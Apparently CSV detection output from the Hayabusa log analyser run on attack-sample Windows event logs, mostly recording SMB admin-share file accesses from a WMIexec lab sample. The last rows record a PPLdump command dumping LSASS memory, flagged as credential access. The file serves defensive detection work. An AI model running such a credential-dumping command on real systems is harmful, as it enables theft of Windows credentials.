0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
